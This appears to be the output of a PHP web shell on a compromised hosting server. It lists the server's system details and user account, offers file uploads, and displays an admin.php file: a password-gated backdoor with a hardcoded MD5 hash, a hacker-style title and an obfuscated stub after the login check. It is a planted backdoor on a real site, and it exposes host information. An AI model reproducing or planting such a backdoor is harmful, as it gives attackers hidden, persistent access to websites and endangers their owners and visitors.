HEX
Server: Apache
System: Linux d15.hzone.ro 3.10.0-962.3.2.lve1.5.87.el7.x86_64 #1 SMP Tue Jan 28 09:38:56 UTC 2025 x86_64
User: velceapa (1444)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/velceapa/startupzone.ro/admin.php
<?php
session_start();

/* MD5 hash of your password (example: md5("mypassword")) */
$PASS_MD5 = "ce55d7ea9fdf0dfd2aef483743e2e022";

if (!isset($_SESSION['auth'])) {
    if (isset($_POST['p']) && md5($_POST['p']) === $PASS_MD5) {
        $_SESSION['auth'] = true;
    } else {
        ?>
        <!DOCTYPE html>
        <html>
        <head>
            <title>byp4a55 professor6T9</title>
        </head>
        <body>
            <form method="post">
                <input type="password" name="p" placeholder="Password">
                <button type="submit">Enter</button>
            </form>
        </body>
        </html>
        <?php
        exit;
    }
}
?>
<title>byp4a55 professor6T9</title><?=/****/@null; /********/ /*******/ /********//**/?>